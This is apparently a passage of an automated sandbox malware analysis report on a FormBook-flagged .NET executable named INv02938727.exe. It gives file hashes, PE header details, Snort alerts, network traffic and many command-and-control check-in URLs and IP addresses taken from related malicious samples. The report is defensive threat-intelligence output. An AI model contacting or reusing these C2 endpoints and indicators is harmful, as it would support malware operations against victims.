                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@9/1@3/3
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 9.5% (good quality ratio 8.5%)
                                              • Quality average: 73.3%
                                              • Quality standard deviation: 31.8%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              07:31:21API Interceptor2x Sleep call for process: INv02938727.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              184.168.131.241ProForma Invoice 20210510.exeGet hashmaliciousBrowse
                                              • www.reservesunbeds.com/u8nw/?yVUx=0BIXczdHaL8h5fn&hb8Tz=k2CKzalxf+HTI/YA5ZUZEbPplHxW2QsGEOhR0/8w4ZbDPb6D4jRkh7SQnOJYmVIWFsdJ
                                              PO-UTITECH 0511.exeGet hashmaliciousBrowse
                                              • www.youporn-live.net/sve/?hL=-Z3dvB&0nK83v=C8vvv0MaX2y/U2Z3Q9rasdODAQyMwmTqNTEWmqcd52/p7ch4zX9D9XByyfQTmXdQf7CQjqgJug==
                                              POI09876OIUY.exeGet hashmaliciousBrowse
                                              • www.ssssummit.com/uv34/?9rx=WMQTG0rumw6bKas1ntyyM+QsxkhHxu1ZUcBmNY6ij7cyCWSVhqmkPYQs9C/7EVYcnBE0&bJ=_P2pFHQpqJUh
                                              4si5VtPNTe.exeGet hashmaliciousBrowse
                                              • www.brlnathletics.com/bucw/?APw8=MCIZYDzPkuscjpMKn6eGoQ/RcoYF14tLcsdPKcaWzW+X8DCZGW/2r27VfqhEjcQn85UoKzeBLw==&b62T=5jlLiNy09
                                              invscan052021.exeGet hashmaliciousBrowse
                                              • www.schmelzens.com/ued5/?5jRt=mdMCgS9ILlmCGgqJcZiXF4nHlR4RxT7ynU5KvIund6ihpo8hKpkex0rM9NCAHKrGECmZ&2dTH=c6AhPR10EV7lG
                                              da.exeGet hashmaliciousBrowse
                                              • www.palomachurch.com/8u3b/?dZ8=BT0h&hDKxoPS=9jYQaMLPhL6iMydi3VPda4ZpO9Nse4x/dRiG0pGEWG94UmnbrF8uLUegU7vIR5fuSTVT5I6wDQ==
                                              Payment.xlsxGet hashmaliciousBrowse
                                              • www.ottawahomevalues.info/8u3b/?zh=xUmcyzOh4HdFuvhunHHAKcZZd7JmKNqhEswdgXWKPEcA2epsJKzScQzpRfSI4u1UmTOkNQ==&BL3=jFNt_dFXS
                                              PURCHASE ORDER 5112101.xlsxGet hashmaliciousBrowse
                                              • www.myrootsandtrees.com/bucw/?btx=2DQmETE5ym4XCRWr28zmwwOJR5akFTB0jDotWvpECgLZnABSzS3kskU/ZtiFd8SyHqCl+w==&LzrL=u2M8sjUhfhtp-z
                                              Materialliste f#U00fcr Angebot.exeGet hashmaliciousBrowse
                                              • www.universallypc.com/mbg/?d4tTFV0x=JHtrtDQJDTvHmQjdlZxCkdFPYzqLg9GX2wZONh07d53HiePR7Au08rIVTnC7FKbvwxp0DBK+2w==&vP=9rQPzxEXvpg8-Jrp
                                              Purchase Order.exeGet hashmaliciousBrowse
                                              • www.xn--demirelik-u3a.com/u8nw/?wJB=-ZLXOP0XzvBHZPRp&jZhtajbP=jabiRJB0+7MeKC/lblDeYefgEQ6ZikoDt3u4Qwck14FnjpsvvdwaEw6ThGJ2Yxzzpw8J
                                              New Order.exeGet hashmaliciousBrowse
                                              • www.britainblog.com/un8c/?a2MLWLu=ScSc7+wN2fhzbElO1qeWCW9UaeY5Q5s50OV0RzK60v9iEHECxnAHbwg3oRc1uopK9S++&l4=1bNDCf9Pbhw
                                              FY9Z5TR6rr.exeGet hashmaliciousBrowse
                                              • www.myrootsandtrees.com/bucw/?4hlPBD=2DQmETE8yh4TCBan08zmwwOJR5akFTB0jDw9Ks1FGALYnxtU0Cmo6gs9aLiDFdK6Lc2EnGtSNQ==&l0GD1=xBZDi6rpmLdp-
                                              PURCHASE ORDER.xlsxGet hashmaliciousBrowse
                                              • www.no-dietdiet.com/bucw/?e6=dxodHDGP&zdM0JRXx=AaevXC6Zw/dWc9ErEUUud//xoPiFgQsvnIBpIpcw4NMsFbTc+swprThfuXKMl6XX0OSdQw==
                                              cks.exeGet hashmaliciousBrowse
                                              • www.xn--demirelik-u3a.com/u8nw/?f0=jabiRJB0+7MeKC/lblDeYefgEQ6ZikoDt3u4Qwck14FnjpsvvdwaEw6ThFl1EB/LkRBfGe9jhg==&6l6x=E4ClVdU
                                              4LkSpeVqKR.exeGet hashmaliciousBrowse
                                              • www.montcoimmigrationlawyer.com/uoe8/?rDHpw=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&V2=LhqpTfJ8
                                              0a97784c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                              • www.leafylyfe.com/et9g/?BZ6=TF/YS3LdfnvKlPm037wYtLAt8WY6EQJ7LI+z0LNg8R7H3LFT4rrA/oRIWqbTaqJ76YkP/g==&bdC=7njp7th
                                              new order.xlsxGet hashmaliciousBrowse
                                              • www.montcoimmigrationlawyer.com/uoe8/?PbvtUz=DVW7OxuWilp3hUkhBzIJzGfsiMq3vXOqW3XcgnFXnAhOJxKbpl47XK0K/rgsfP0Uf/nXgQ==&-Z=zVeT
                                              Order Euro 890,000.exeGet hashmaliciousBrowse
                                              • www.anvistanes.com/nbg/?AnE=N0DpoDyPy2&GzuDf=n4dYPyDMx0k3VV9rtAXeD+dEmxGAmcHEEuMb7hMO7KemGcZmCd/seF3bHBRuXqx2nn1q
                                              Request for Quotation.exeGet hashmaliciousBrowse
                                              • www.xn--demirelik-u3a.com/u8nw/?K8b8q=AbsdphHPUnHTPv7&Q2M=jabiRJB0+7MeKC/lblDeYefgEQ6ZikoDt3u4Qwck14FnjpsvvdwaEw6ThGJ2Yxzzpw8J
                                              NEW ODER.exeGet hashmaliciousBrowse
                                              • www.privat-livecam.net/dxe/?Rl=ZoCaUCEqY6gzp5oJRDYIR6dKJfPIlGszBOOrarTzvY3McW8xaXiDg62sxdfo0BcngbHw&EvU80d=fbWpjHI8A8

                                              Domains

                                              No context

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              AS-26496-GO-DADDY-COM-LLCUSouCeNMzxAW8tbEx.exeGet hashmaliciousBrowse
                                              • 166.62.10.181
                                              551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                              • 198.12.154.178
                                              export of document 555091.xlsmGet hashmaliciousBrowse
                                              • 45.40.135.135
                                              fax 4044.xlsmGet hashmaliciousBrowse
                                              • 198.12.154.178
                                              generated check 8460.xlsmGet hashmaliciousBrowse
                                              • 198.12.154.178
                                              export of bill 896621.xlsmGet hashmaliciousBrowse
                                              • 198.12.154.178
                                              invoice 85046.xlsmGet hashmaliciousBrowse
                                              • 198.12.154.178
                                              bill 04050.xlsmGet hashmaliciousBrowse
                                              • 198.12.154.178
                                              copy of payment 0535.xlsmGet hashmaliciousBrowse
                                              • 45.40.135.135
                                              scan of fax 096859.xlsmGet hashmaliciousBrowse
                                              • 198.12.154.178
                                              scan of invoice 91510.xlsmGet hashmaliciousBrowse
                                              • 198.12.154.178
                                              export of check 684585.xlsmGet hashmaliciousBrowse
                                              • 198.12.154.178
                                              SWIFT COPY.exeGet hashmaliciousBrowse
                                              • 107.180.1.30
                                              ProForma Invoice 20210510.exeGet hashmaliciousBrowse
                                              • 184.168.131.241
                                              PO-UTITECH 0511.exeGet hashmaliciousBrowse
                                              • 184.168.131.241
                                              POI09876OIUY.exeGet hashmaliciousBrowse
                                              • 184.168.131.241
                                              4si5VtPNTe.exeGet hashmaliciousBrowse
                                              • 184.168.131.241
                                              invscan052021.exeGet hashmaliciousBrowse
                                              • 184.168.131.241
                                              da.exeGet hashmaliciousBrowse
                                              • 184.168.131.241
                                              Payment.xlsxGet hashmaliciousBrowse
                                              • 184.168.131.241
                                              EGIHOSTINGUSPOI09876OIUY.exeGet hashmaliciousBrowse
                                              • 45.39.20.158
                                              invscan052021.exeGet hashmaliciousBrowse
                                              • 104.252.43.114
                                              PURCHASE ORDER 5112101.xlsxGet hashmaliciousBrowse
                                              • 172.252.102.196
                                              Purchase Order.exeGet hashmaliciousBrowse
                                              • 45.38.16.182
                                              WAkePI6vWufG5Bb.exeGet hashmaliciousBrowse
                                              • 142.111.54.187
                                              new order.xlsxGet hashmaliciousBrowse
                                              • 104.252.75.149
                                              Il nuovo ordine e nell'elenco allegato.exeGet hashmaliciousBrowse
                                              • 166.88.252.48
                                              987654OIUYFG.exeGet hashmaliciousBrowse
                                              • 104.164.224.84
                                              2B0CsHzr8o.exeGet hashmaliciousBrowse
                                              • 107.186.80.147
                                              REVISED ORDER.exeGet hashmaliciousBrowse
                                              • 107.187.161.189
                                              NEW ORDER.exeGet hashmaliciousBrowse
                                              • 45.38.16.182
                                              new order.exeGet hashmaliciousBrowse
                                              • 45.39.88.129
                                              TT.exeGet hashmaliciousBrowse
                                              • 107.165.149.13
                                              a3aa510e_by_Libranalysis.exeGet hashmaliciousBrowse
                                              • 104.252.43.114
                                              Airwaybill # 6913321715.exeGet hashmaliciousBrowse
                                              • 107.165.10.98
                                              PURCHASE ORDER.exeGet hashmaliciousBrowse
                                              • 45.38.16.182
                                              DocNo2300058329.doc__.rtfGet hashmaliciousBrowse
                                              • 104.252.43.114
                                              Bill Of Lading & Packing List.pdf.gz.exeGet hashmaliciousBrowse
                                              • 104.252.53.97
                                              pVrqrGltiL.exeGet hashmaliciousBrowse
                                              • 50.118.250.118
                                              PO#10244.exeGet hashmaliciousBrowse
                                              • 45.39.20.158

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INv02938727.exe.log
                                              Process:C:\Users\user\Desktop\INv02938727.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1314
                                              Entropy (8bit):5.350128552078965
                                              Encrypted:false
                                              SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                              MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                              SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                              SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                              SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.700274057382145
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:INv02938727.exe
                                              File size:719360
                                              MD5:a3b74acf9723e53d6caea736faae9708
                                              SHA1:2714e0ec97d81921312f0db6470dc40f55d16b96
                                              SHA256:f8e8f64bb17ffb2fea18b7671602a76a8b5734607c7a7ae035dce8eed8381a74
                                              SHA512:e468c5146e35f8aae5536c7ce6c490b68588af0f71fd5d85d0b1dfe9b1831be55a2d9b8787035fc95e288f41c7ab7c4cf73965d6707bbfbe4685655ffbe4fa6b
                                              SSDEEP:12288:NMf87gJVpnabp1HiqSpLyDrnsSoo7dbi8kg04kuA9Mu:2UghabSLnwdbi8kg1Ip
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.`..............P.................. ........@.. .......................@............@................................

                                              File Icon

                                              Icon Hash:ae53d212d9ccc4ca

                                              Static PE Info

                                              General

                                              Entrypoint:0x4afdde
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x60986599 [Sun May 9 22:43:37 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:v4.0.30319
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xafd8c0x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x1764.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xadde40xade00False0.834349445093data7.70994295605IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rsrc0xb00000x17640x1800False0.443196614583data5.616925312IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0xb20000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_ICON0xb01600x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4293725196, next used block 4293659660
                                              RT_GROUP_ICON0xb12080x14data
                                              RT_GROUP_ICON0xb121c0x14data
                                              RT_VERSION0xb12300x348data
                                              RT_MANIFEST0xb15780x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Version Infos

                                              DescriptionData
                                              Translation0x0000 0x04b0
                                              LegalCopyrightCopyright MCS 2018
                                              Assembly Version1.0.0.0
                                              InternalNameSafeHeapHandleCache.exe
                                              FileVersion1.0.0.0
                                              CompanyNameMCS
                                              LegalTrademarks
                                              Comments
                                              ProductNameLibrary
                                              ProductVersion1.0.0.0
                                              FileDescriptionLibrary
                                              OriginalFilenameSafeHeapHandleCache.exe

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              05/12/21-07:32:34.071720TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972380192.168.2.734.102.136.180
                                              05/12/21-07:32:34.071720TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972380192.168.2.734.102.136.180
                                              05/12/21-07:32:34.071720TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972380192.168.2.734.102.136.180
                                              05/12/21-07:32:34.208539TCP1201ATTACK-RESPONSES 403 Forbidden804972334.102.136.180192.168.2.7
                                              05/12/21-07:33:17.629103TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.7184.168.131.241
                                              05/12/21-07:33:17.629103TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.7184.168.131.241
                                              05/12/21-07:33:17.629103TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973380192.168.2.7184.168.131.241

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 12, 2021 07:32:34.030286074 CEST4972380192.168.2.734.102.136.180
                                              May 12, 2021 07:32:34.071357012 CEST804972334.102.136.180192.168.2.7
                                              May 12, 2021 07:32:34.071485996 CEST4972380192.168.2.734.102.136.180
                                              May 12, 2021 07:32:34.071719885 CEST4972380192.168.2.734.102.136.180
                                              May 12, 2021 07:32:34.112662077 CEST804972334.102.136.180192.168.2.7
                                              May 12, 2021 07:32:34.208539009 CEST804972334.102.136.180192.168.2.7
                                              May 12, 2021 07:32:34.208564997 CEST804972334.102.136.180192.168.2.7
                                              May 12, 2021 07:32:34.208874941 CEST4972380192.168.2.734.102.136.180
                                              May 12, 2021 07:32:34.208909988 CEST4972380192.168.2.734.102.136.180
                                              May 12, 2021 07:32:34.249890089 CEST804972334.102.136.180192.168.2.7
                                              May 12, 2021 07:32:56.528295040 CEST4973280192.168.2.7107.165.40.251
                                              May 12, 2021 07:32:56.723351955 CEST8049732107.165.40.251192.168.2.7
                                              May 12, 2021 07:32:56.725675106 CEST4973280192.168.2.7107.165.40.251
                                              May 12, 2021 07:32:56.725887060 CEST4973280192.168.2.7107.165.40.251
                                              May 12, 2021 07:32:57.120785952 CEST8049732107.165.40.251192.168.2.7
                                              May 12, 2021 07:32:57.152642012 CEST8049732107.165.40.251192.168.2.7
                                              May 12, 2021 07:32:57.153027058 CEST4973280192.168.2.7107.165.40.251
                                              May 12, 2021 07:32:57.346057892 CEST8049732107.165.40.251192.168.2.7
                                              May 12, 2021 07:32:57.346165895 CEST8049732107.165.40.251192.168.2.7
                                              May 12, 2021 07:32:57.346312046 CEST4973280192.168.2.7107.165.40.251
                                              May 12, 2021 07:33:17.432018042 CEST4973380192.168.2.7184.168.131.241
                                              May 12, 2021 07:33:17.628640890 CEST8049733184.168.131.241192.168.2.7
                                              May 12, 2021 07:33:17.628774881 CEST4973380192.168.2.7184.168.131.241
                                              May 12, 2021 07:33:17.629102945 CEST4973380192.168.2.7184.168.131.241
                                              May 12, 2021 07:33:17.825490952 CEST8049733184.168.131.241192.168.2.7
                                              May 12, 2021 07:33:17.924803019 CEST8049733184.168.131.241192.168.2.7
                                              May 12, 2021 07:33:17.924848080 CEST8049733184.168.131.241192.168.2.7
                                              May 12, 2021 07:33:17.925142050 CEST4973380192.168.2.7184.168.131.241
                                              May 12, 2021 07:33:17.925301075 CEST4973380192.168.2.7184.168.131.241
                                              May 12, 2021 07:33:18.121701956 CEST8049733184.168.131.241192.168.2.7

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 12, 2021 07:31:11.253586054 CEST5084853192.168.2.78.8.8.8
                                              May 12, 2021 07:31:11.318593979 CEST53508488.8.8.8192.168.2.7
                                              May 12, 2021 07:31:11.860301018 CEST6124253192.168.2.78.8.8.8
                                              May 12, 2021 07:31:11.912292957 CEST53612428.8.8.8192.168.2.7
                                              May 12, 2021 07:31:12.753283024 CEST5856253192.168.2.78.8.8.8
                                              May 12, 2021 07:31:12.812706947 CEST53585628.8.8.8192.168.2.7
                                              May 12, 2021 07:31:14.106764078 CEST5659053192.168.2.78.8.8.8
                                              May 12, 2021 07:31:14.157556057 CEST53565908.8.8.8192.168.2.7
                                              May 12, 2021 07:31:15.015471935 CEST6050153192.168.2.78.8.8.8
                                              May 12, 2021 07:31:15.067043066 CEST53605018.8.8.8192.168.2.7
                                              May 12, 2021 07:31:16.372122049 CEST5377553192.168.2.78.8.8.8
                                              May 12, 2021 07:31:16.426413059 CEST53537758.8.8.8192.168.2.7
                                              May 12, 2021 07:31:17.717036963 CEST5183753192.168.2.78.8.8.8
                                              May 12, 2021 07:31:17.776796103 CEST53518378.8.8.8192.168.2.7
                                              May 12, 2021 07:31:19.303694010 CEST5541153192.168.2.78.8.8.8
                                              May 12, 2021 07:31:19.352372885 CEST53554118.8.8.8192.168.2.7
                                              May 12, 2021 07:31:21.112109900 CEST6366853192.168.2.78.8.8.8
                                              May 12, 2021 07:31:21.160839081 CEST53636688.8.8.8192.168.2.7
                                              May 12, 2021 07:31:22.597744942 CEST5464053192.168.2.78.8.8.8
                                              May 12, 2021 07:31:22.646928072 CEST53546408.8.8.8192.168.2.7
                                              May 12, 2021 07:31:24.053947926 CEST5873953192.168.2.78.8.8.8
                                              May 12, 2021 07:31:24.105631113 CEST53587398.8.8.8192.168.2.7
                                              May 12, 2021 07:31:25.592647076 CEST6033853192.168.2.78.8.8.8
                                              May 12, 2021 07:31:25.650290966 CEST53603388.8.8.8192.168.2.7
                                              May 12, 2021 07:31:26.529448032 CEST5871753192.168.2.78.8.8.8
                                              May 12, 2021 07:31:26.578330040 CEST53587178.8.8.8192.168.2.7
                                              May 12, 2021 07:31:27.595426083 CEST5976253192.168.2.78.8.8.8
                                              May 12, 2021 07:31:27.647141933 CEST53597628.8.8.8192.168.2.7
                                              May 12, 2021 07:31:28.797008038 CEST5432953192.168.2.78.8.8.8
                                              May 12, 2021 07:31:28.848330975 CEST53543298.8.8.8192.168.2.7
                                              May 12, 2021 07:31:29.983508110 CEST5805253192.168.2.78.8.8.8
                                              May 12, 2021 07:31:30.035233021 CEST53580528.8.8.8192.168.2.7
                                              May 12, 2021 07:31:31.305459976 CEST5400853192.168.2.78.8.8.8
                                              May 12, 2021 07:31:31.364151001 CEST53540088.8.8.8192.168.2.7
                                              May 12, 2021 07:31:32.102993965 CEST5945153192.168.2.78.8.8.8
                                              May 12, 2021 07:31:32.151689053 CEST53594518.8.8.8192.168.2.7
                                              May 12, 2021 07:31:32.323236942 CEST5291453192.168.2.78.8.8.8
                                              May 12, 2021 07:31:32.383743048 CEST53529148.8.8.8192.168.2.7
                                              May 12, 2021 07:31:33.821563959 CEST6456953192.168.2.78.8.8.8
                                              May 12, 2021 07:31:33.871035099 CEST53645698.8.8.8192.168.2.7
                                              May 12, 2021 07:31:36.264314890 CEST5281653192.168.2.78.8.8.8
                                              May 12, 2021 07:31:36.314393997 CEST53528168.8.8.8192.168.2.7
                                              May 12, 2021 07:31:37.413877964 CEST5078153192.168.2.78.8.8.8
                                              May 12, 2021 07:31:37.462654114 CEST53507818.8.8.8192.168.2.7
                                              May 12, 2021 07:31:41.517299891 CEST5423053192.168.2.78.8.8.8
                                              May 12, 2021 07:31:41.567410946 CEST53542308.8.8.8192.168.2.7
                                              May 12, 2021 07:31:42.770950079 CEST5491153192.168.2.78.8.8.8
                                              May 12, 2021 07:31:42.819693089 CEST53549118.8.8.8192.168.2.7
                                              May 12, 2021 07:32:03.805124044 CEST4995853192.168.2.78.8.8.8
                                              May 12, 2021 07:32:03.864833117 CEST53499588.8.8.8192.168.2.7
                                              May 12, 2021 07:32:07.273396969 CEST5086053192.168.2.78.8.8.8
                                              May 12, 2021 07:32:07.322237015 CEST53508608.8.8.8192.168.2.7
                                              May 12, 2021 07:32:07.426489115 CEST5045253192.168.2.78.8.8.8
                                              May 12, 2021 07:32:07.484920979 CEST53504528.8.8.8192.168.2.7
                                              May 12, 2021 07:32:33.959813118 CEST5973053192.168.2.78.8.8.8
                                              May 12, 2021 07:32:34.021111012 CEST53597308.8.8.8192.168.2.7
                                              May 12, 2021 07:32:41.932732105 CEST5931053192.168.2.78.8.8.8
                                              May 12, 2021 07:32:42.001012087 CEST53593108.8.8.8192.168.2.7
                                              May 12, 2021 07:32:49.960647106 CEST5191953192.168.2.78.8.8.8
                                              May 12, 2021 07:32:50.018819094 CEST53519198.8.8.8192.168.2.7
                                              May 12, 2021 07:32:56.455708981 CEST6429653192.168.2.78.8.8.8
                                              May 12, 2021 07:32:56.526810884 CEST53642968.8.8.8192.168.2.7
                                              May 12, 2021 07:33:17.362968922 CEST5668053192.168.2.78.8.8.8
                                              May 12, 2021 07:33:17.430162907 CEST53566808.8.8.8192.168.2.7
                                              May 12, 2021 07:33:20.818274975 CEST5882053192.168.2.78.8.8.8
                                              May 12, 2021 07:33:20.887164116 CEST53588208.8.8.8192.168.2.7
                                              May 12, 2021 07:33:22.883336067 CEST6098353192.168.2.78.8.8.8
                                              May 12, 2021 07:33:22.948488951 CEST53609838.8.8.8192.168.2.7

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              May 12, 2021 07:32:33.959813118 CEST192.168.2.78.8.8.80x411fStandard query (0)www.manifestarz.comA (IP address)IN (0x0001)
                                              May 12, 2021 07:32:56.455708981 CEST192.168.2.78.8.8.80x7f89Standard query (0)www.funtimespheres.comA (IP address)IN (0x0001)
